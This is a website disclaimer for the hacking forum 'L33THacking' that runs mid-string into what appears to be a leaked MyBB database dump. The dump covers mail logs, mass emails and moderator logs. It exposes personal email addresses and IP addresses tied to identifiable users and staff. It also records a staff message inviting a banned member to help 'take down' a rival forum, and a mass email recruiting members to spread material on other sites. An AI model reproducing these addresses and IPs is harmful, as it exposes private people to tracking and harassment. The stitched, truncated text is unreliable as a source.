  • Nothing on this website constitutes, or is meant to constitute, advice of any kind.

    Limitation of warranties

    The legal information on this website is provided “as is” without any representations or warranties, express or implied. L33THacking makes no representations or warranties in relation to the legal information on this website.
    Without prejudice to the generality of the foregoing paragraph, L33THacking does not warrant that:
    - the legal information on this website will be constantly available, or available at all; or
    - the legal information on this website is complete, true, accurate, up-to-date, or non-misleading.

    Liability

    Nothing in this legal disclaimer will limit any of our liabilities in any way that is not permitted under applicable law, or exclude any of our liabilities that may not be excluded under applicable law.

    Exceptions

    Nothing in this website disclaimer will exclude or limit any warranty implied by law that it would be unlawful to exclude or limit; and nothing in this website disclaimer will exclude or limit L33THacking liability in respect of any:
    • death or personal injury caused by L33THacking negligence;
    • fraud or fraudulent misrepresentation on the part of L33THacking or
    • matter which it would be illegal or unlawful for L33THacking to exclude or limit, or to attempt or purport to exclude or limit, its liability.

    Reasonableness

    • By using this website, you agree that the exclusions and limitations of liability set out in this website disclaimer are reasonable.
    • If you do not think they are reasonable, you must not use this website.


    Other parties

    [You accept that, as a limited liability entity, L33THacking has an interest in limiting the personal liability of its officers and employees. You agree that you will not bring any claim personally against L33THacking officers or employees in respect of any losses you suffer in connection with the website.]
    [Without prejudice to the foregoing paragraph,] you agree that the limitations of warranties and liability set out in this website disclaimer will protect L33THacking officers, employees, agents, subsidiaries, successors, assigns and sub-contractors as well as L33THacking.

    This Website Disclaimer

    This website disclaimer was been distributed by freenetlaw.com, HMSEF and Hackforums', '0', '1', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_helpsections`; CREATE TABLE `mybb_helpsections` ( `sid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `description` text NOT NULL, `usetranslation` int(1) NOT NULL DEFAULT '0', `enabled` int(1) NOT NULL DEFAULT '0', `disporder` smallint(5) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`sid`) ) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_helpsections` WRITE; INSERT INTO `mybb_helpsections` (`sid`, `name`, `description`, `usetranslation`, `enabled`, `disporder`) VALUES ('1', 'Account Information', 'Basic instructions for maintaining a forum account.', '1', '1', '2'); INSERT INTO `mybb_helpsections` (`sid`, `name`, `description`, `usetranslation`, `enabled`, `disporder`) VALUES ('2', 'Posting', 'Posting, replying, and basic usage of forum.', '1', '1', '3'); INSERT INTO `mybb_helpsections` (`sid`, `name`, `description`, `usetranslation`, `enabled`, `disporder`) VALUES ('3', 'General', 'General Information regarding L33THacking', '0', '1', '1'); INSERT INTO `mybb_helpsections` (`sid`, `name`, `description`, `usetranslation`, `enabled`, `disporder`) VALUES ('4', 'Marketplace', 'Marketplace rules, regulations and instructions. Basically a guide around Marketplace. ', '0', '1', '1'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_icons`; CREATE TABLE `mybb_icons` ( `iid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(120) NOT NULL DEFAULT '', `path` varchar(220) NOT NULL DEFAULT '', PRIMARY KEY (`iid`) ) ENGINE=MyISAM AUTO_INCREMENT=21 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_icons` WRITE; INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('1', 'Bug', 'images/icons/bug.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('2', 'Exclamation', 'images/icons/exclamation.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('3', 'Question', 'images/icons/question.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('4', 'Smile', 'images/icons/smile.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('5', 'Sad', 'images/icons/sad.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('6', 'Wink', 'images/icons/wink.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('7', 'Big Grin', 'images/icons/biggrin.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('8', 'Tongue', 'images/icons/tongue.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('9', 'Brick', 'images/icons/brick.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('10', 'Heart', 'images/icons/heart.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('11', 'Information', 'images/icons/information.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('12', 'Lightbulb', 'images/icons/lightbulb.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('13', 'Music', 'images/icons/music.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('14', 'Photo', 'images/icons/photo.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('15', 'Rainbow', 'images/icons/rainbow.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('16', 'Shocked', 'images/icons/shocked.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('17', 'Star', 'images/icons/star.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('18', 'Thumbs Down', 'images/icons/thumbsdown.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('19', 'Thumbs Up', 'images/icons/thumbsup.gif'); INSERT INTO `mybb_icons` (`iid`, `name`, `path`) VALUES ('20', 'Video', 'images/icons/video.gif'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_joinrequests`; CREATE TABLE `mybb_joinrequests` ( `rid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `gid` smallint(5) unsigned NOT NULL DEFAULT '0', `reason` varchar(250) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`rid`) ) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_joinrequests` WRITE; INSERT INTO `mybb_joinrequests` (`rid`, `uid`, `gid`, `reason`, `dateline`) VALUES ('1', '61', '11', 'hi', '1345479695'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_mailerrors`; CREATE TABLE `mybb_mailerrors` ( `eid` int(10) unsigned NOT NULL AUTO_INCREMENT, `subject` varchar(200) NOT NULL DEFAULT '', `message` text NOT NULL, `toaddress` varchar(150) NOT NULL DEFAULT '', `fromaddress` varchar(150) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `error` text NOT NULL, `smtperror` varchar(200) NOT NULL DEFAULT '', `smtpcode` int(5) NOT NULL DEFAULT '0', PRIMARY KEY (`eid`) ) ENGINE=MyISAM AUTO_INCREMENT=289 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_mailerrors` WRITE; INSERT INTO `mybb_mailerrors` (`eid`, `subject`, `message`, `toaddress`, `fromaddress`, `dateline`, `error`, `smtperror`, `smtpcode`) VALUES ('288', 'MyBB error on L33T Hacking', 'Your copy of MyBB running on L33T Hacking (http://l33thacking.net) has experienced an error. Details of the error include: --- Type: 20 File: (Line no. 0) Message SQL Error: 1327 - Undeclared variable: Array Query: SELECT message FROM mybb_posts WHERE tid = \'1050\' LIMIT Array', 'support@l33thacking.net', 'support@l33thacking.net', '1352527172', 'The mail server does not understand the RCPT TO command. Reason: N/A', '', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_maillogs`; CREATE TABLE `mybb_maillogs` ( `mid` int(10) unsigned NOT NULL AUTO_INCREMENT, `subject` varchar(200) NOT NULL DEFAULT '', `message` text NOT NULL, `dateline` bigint(30) NOT NULL DEFAULT '0', `fromuid` int(10) unsigned NOT NULL DEFAULT '0', `fromemail` varchar(200) NOT NULL DEFAULT '', `touid` bigint(30) NOT NULL DEFAULT '0', `toemail` varchar(200) NOT NULL DEFAULT '', `tid` int(10) unsigned NOT NULL DEFAULT '0', `ipaddress` varchar(20) NOT NULL DEFAULT '', PRIMARY KEY (`mid`) ) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_maillogs` WRITE; INSERT INTO `mybb_maillogs` (`mid`, `subject`, `message`, `dateline`, `fromuid`, `fromemail`, `touid`, `toemail`, `tid`, `ipaddress`) VALUES ('3', 'Hi Banekitty - From L33T Hacking Staff', 'Hi Banekitty, I read the news by The Anarchist and read about your demotion. Your account is currently banned on L33T Hacking, if you are willing to move to LH and stay active on LH then I\'ll unban your account. I\'m sure you understand the fact that LH is way better than AF because we have more advanced blackhat discussions and by becoming active on my site you will be helping us dominate AF. If you want you can also help us take down AF. You might even become a Mod if you are active on LH. Regards, L33T Hacking Staff support@l33thacking.net', '1351983226', '1', 'kamihafeez@hotmail.com', '251', 'banekitty@nospam.ze.tc', '0', '72.231.24.165'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_mailqueue`; CREATE TABLE `mybb_mailqueue` ( `mid` int(10) unsigned NOT NULL AUTO_INCREMENT, `mailto` varchar(200) NOT NULL, `mailfrom` varchar(200) NOT NULL, `subject` varchar(200) NOT NULL, `message` text NOT NULL, `headers` text NOT NULL, PRIMARY KEY (`mid`) ) ENGINE=MyISAM AUTO_INCREMENT=1073 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_mailqueue` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_massemails`; CREATE TABLE `mybb_massemails` ( `mid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `subject` varchar(200) NOT NULL DEFAULT '', `message` text NOT NULL, `htmlmessage` text NOT NULL, `type` tinyint(1) NOT NULL DEFAULT '0', `format` tinyint(1) NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `senddate` bigint(30) NOT NULL DEFAULT '0', `status` tinyint(1) NOT NULL DEFAULT '0', `sentcount` int(10) unsigned NOT NULL DEFAULT '0', `totalcount` int(10) unsigned NOT NULL DEFAULT '0', `conditions` text NOT NULL, `perpage` smallint(4) NOT NULL DEFAULT '50', PRIMARY KEY (`mid`) ) ENGINE=MyISAM AUTO_INCREMENT=10 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_massemails` WRITE; INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('1', '1', 'L33THACKING.COM is Back', 'This is a quick email to let you know that L33THacking.com is back, it was offline due to some server maintenance. L33thacking is now accessible and you are free to participate with others. {bburl} {bbname} Regards, L33THacking Staff', 'This is a quick email to let you know that L33THacking.com is back, it was offline due to some server maintenance. L33thacking is now accessible and you are free to participate with others. {bburl} {bbname} Regards, L33THacking Staff', '0', '2', '1342040850', '1342040885', '3', '9', '9', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:8:{i:0;s:1:\"4\";i:1;s:1:\"5\";i:2;s:1:\"7\";i:3;s:1:\"8\";i:4;s:1:\"9\";i:5;s:2:\"10\";i:6;s:1:\"6\";i:7;s:1:\"2\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('5', '1', 'Reminder from L33THacking Forums', 'Hi {username}, This email has been sent out to remind everyone that L33THacking has moved to l33thacking.net, we do not use l33thacking.com anymore. We are sorry if this may have caused you any inconvenience. We planned to send out this email few weeks ago but today the LH staff found out that the email was not sent out due to some technical problems. If you have forgotten your password then reset your password [url=http://l33thacking.net/member.php?action=lostpw]here[/url] and if you have forgotten your username then please send us an email through our contact form with the email you could possibly be using or your previous and current usernames. Regards, L33THacking Staff support@l33thacking.net ', 'Hi {username}, This email has been sent out to remind everyone that L33THacking has moved to l33thacking.net, we do not use l33thacking.com anymore. We are sorry if this may have caused you any inconvenience. We planned to send out this email few weeks ago but today the LH staff found out that the email was not sent out due to some technical problems. If you have forgotten your password then reset your password [url=http://l33thacking.net/member.php?action=lostpw]here[/url] and if you have forgotten your username then please send us an email through our contact form with the email you could possibly be using or your previous and current usernames. Regards, L33THacking Staff support@l33thacking.net ', '0', '2', '1349760868', '1349760936', '3', '179', '179', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:9:{i:0;s:1:\"4\";i:1;s:1:\"5\";i:2;s:2:\"12\";i:3;s:1:\"9\";i:4;s:2:\"18\";i:5;s:2:\"17\";i:6;s:1:\"6\";i:7;s:1:\"2\";i:8;s:2:\"13\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('6', '1', 'Help Advertise LH', 'Hi {username}, We are looking forward to people who are willing to help advertise LH. Don\'t worry, it\'s not going to take up much of your time. It would take hardly 10 minutes or else a day. This is completely voluntary, if you are interested then answer the following questions and post them [url=http://l33thacking.net/thread-1051.html]here[/url] [quote] 1. Do you have any spare email? 2. Do you know any hacker blogs? 3. Can you help advertise on twitter? 4. What search engine do you use? 5. Do you upload videos on youtube? 6. Are you registered on any active site that\'s not related to hacking? 7. Are you registered on hackforums or ubers? 8. If we provide you with programs and ebooks, can you share them on other sites? [/quote] Thanks for reading', '', '1', '0', '1350880709', '1350880769', '3', '19', '19', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:7:{i:0;s:2:\"12\";i:1;s:2:\"20\";i:2;s:1:\"9\";i:3;s:2:\"17\";i:4;s:1:\"6\";i:5;s:1:\"3\";i:6;s:2:\"13\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('7', '1', 'L33T Hacking Account Activation ', 'Hi {username}, Your account on {bburl} has been manually activated. Due to some technical problems you were not able to receive an activation email. We are sorry for the inconvenience. Regards, L33T Hacking Staff ', 'Hi {username}, Your account on {bburl} has been manually activated. Due to some technical problems you were not able to receive an activation email. We are sorry for the inconvenience. Regards, L33T Hacking Staff ', '0', '2', '1351741695', '1351741709', '3', '11', '11', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:1:{i:0;s:1:\"5\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('8', '1', 'Activation at L33THacking.net', 'Dear {username}, Due to some technical issues you were not able to receive your account activation email. We have manually activated your account. We apologize for the inconvenience. Regards, L33T Hacking Staff {bburl}', 'Dear {username}, Due to some technical issues you were not able to receive your account activation email. We have manually activated your account. We apologize for the inconvenience. Regards, L33T Hacking Staff {bburl}', '0', '2', '1352661786', '1352661802', '3', '6', '6', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:1:{i:0;s:1:\"5\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); INSERT INTO `mybb_massemails` (`mid`, `uid`, `subject`, `message`, `htmlmessage`, `type`, `format`, `dateline`, `senddate`, `status`, `sentcount`, `totalcount`, `conditions`, `perpage`) VALUES ('9', '1', 'L33T Hacking is back after a days downtime', 'Dear {username}, We received a major DDoS attack yesterday so we aren\'t able to keep LH up. L33T Hacking is back and this just a quick email to inform all the users and we apologize for the inconvenience. Regards, L33T Hacking Staff {bburl} support@l33thacking.net', 'Dear {username}, We received a major DDoS attack yesterday so we aren\'t able to keep LH up. L33T Hacking is back and this just a quick email to inform all the users and we apologize for the inconvenience. Regards, L33T Hacking Staff {bburl} support@l33thacking.net', '0', '2', '1352785567', '1352785589', '3', '235', '235', 'a:5:{s:8:\"username\";s:0:\"\";s:5:\"email\";s:0:\"\";s:9:\"usergroup\";a:15:{i:0;s:1:\"5\";i:1;s:1:\"7\";i:2;s:1:\"8\";i:3;s:2:\"14\";i:4;s:2:\"12\";i:5;s:2:\"20\";i:6;s:1:\"9\";i:7;s:2:\"17\";i:8;s:2:\"10\";i:9;s:1:\"6\";i:10;s:1:\"2\";i:11;s:1:\"3\";i:12;s:2:\"21\";i:13;s:2:\"15\";i:14;s:2:\"13\";}s:11:\"postnum_dir\";s:12:\"greater_than\";s:7:\"postnum\";s:0:\"\";}', '50'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_mod_notify`; CREATE TABLE `mybb_mod_notify` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL, `mod_id` int(10) unsigned NOT NULL, `from_id` int(10) unsigned NOT NULL, `subject` text NOT NULL, `message` text NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_mod_notify` WRITE; INSERT INTO `mybb_mod_notify` (`id`, `uid`, `mod_id`, `from_id`, `subject`, `message`) VALUES ('1', '5', '1', '1', 'Your post has been deleted', 'Your post from thread [i]Varied Sections[/i] has been deleted by {USERNAME}. [b]Link to thread:[/b] [url=http://l33thacking.com/showthread.php?tid=45]showthread.php?tid=45[/url] '); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_moderatorlog`; CREATE TABLE `mybb_moderatorlog` ( `uid` int(10) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `tid` int(10) unsigned NOT NULL DEFAULT '0', `pid` int(10) unsigned NOT NULL DEFAULT '0', `action` text NOT NULL, `data` text NOT NULL, `ipaddress` varchar(50) NOT NULL DEFAULT '', KEY `tid` (`tid`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; LOCK TABLES `mybb_moderatorlog` WRITE; INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('228', '1352152092', '3', '1192', '0', 'Thread Moved', 'a:0:{}', '83.83.167.183'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352180418', '7', '1181', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352180429', '7', '1192', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352180749', '0', '234', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352195277', '7', '1192', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352195870', '5', '1204', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352249456', '18', '1120', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352249456', '18', '1120', '0', 'Custom Moderator Tool: Junk ', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352253808', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"302\";s:8:\"username\";s:10:\"Mac Miller\";}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352253944', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"326\";s:8:\"username\";s:10:\"coolkid192\";}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352253964', '0', '0', '0', 'Banned User', 'a:2:{s:3:\"uid\";s:3:\"326\";s:8:\"username\";N;}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('53', '1352314719', '0', '369', '0', 'Thread Closed', 'a:0:{}', '174.11.113.61'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352379350', '46', '765', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352427116', '42', '1145', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352427291', '30', '1226', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7250\";}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352489827', '9', '1232', '0', 'Thread Closed', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352489827', '9', '1232', '0', 'Custom Moderator Tool: Junk ', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352493759', '19', '1232', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352493784', '19', '1232', '0', 'Thread Moved', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352493803', '9', '1232', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7289\";}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352493817', '9', '1232', '0', 'Thread Opened', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352519539', '4', '1227', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352529125', '28', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352529258', '29', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352529266', '30', '0', '0', 'Threads Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352534017', '15', '1209', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352571884', '11', '465', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352576383', '5', '1241', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352577728', '3', '0', '0', 'Threads Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352578788', '3', '1248', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7407\";}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352578807', '3', '1248', '0', 'Edited Post', 'a:1:{s:3:\"pid\";s:4:\"7407\";}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352580597', '7', '1249', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352580694', '48', '1241', '0', 'Thread Moved', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352589764', '61', '1237', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('61', '1352599245', '3', '1236', '0', 'Deleted Post', 'a:0:{}', '99.252.235.12'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352603861', '3', '1251', '0', 'Thread Closed', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352604025', '3', '1248', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352678863', '56', '253', '0', 'Deleted Post', 'a:0:{}', '72.231.24.165'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('1', '1352770121', '1257', '0', '0', 'Thread Stuck', 'a:1:{s:3:\"tid\";N;}', '188.181.59.113'); INSERT INTO `mybb_moderatorlog` (`uid`, `dateline`, `fid`, `tid`, `pid`, `action`, `data`, `ipaddress`) VALUES ('4', '1352770145', '3', '1257', '0', 'Deleted Thread', 'a:0:{}', '72.231.24.165'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_moderators`; CREATE TABLE `mybb_moderators` ( `mid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `id` int(10) unsigned NOT NULL DEFAULT '0', `isgroup` int(1) unsigned NOT NULL DEFAULT '0', `caneditposts` int(1) NOT NULL DEFAULT '0', `candeleteposts` int(1) NOT NULL DEFAULT '0', `canviewips` int(1) NOT NULL DEFAULT '0', `canopenclosethreads` int(1) NOT NULL DEFAULT '0', `canmanagethreads` int(1) NOT NULL DEFAULT '0', `canmovetononmodforum` int(1) NOT NULL DEFAULT '0', `canusecustomtools` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`mid`), KEY `uid` (`id`,`fid`) ) ENGINE=MyISAM AUTO_INCREMENT=17 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_moderators` WRITE; INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('1', '7', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('2', '11', '6', '1', '1', '1', '0', '1', '1', '1', '0'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, 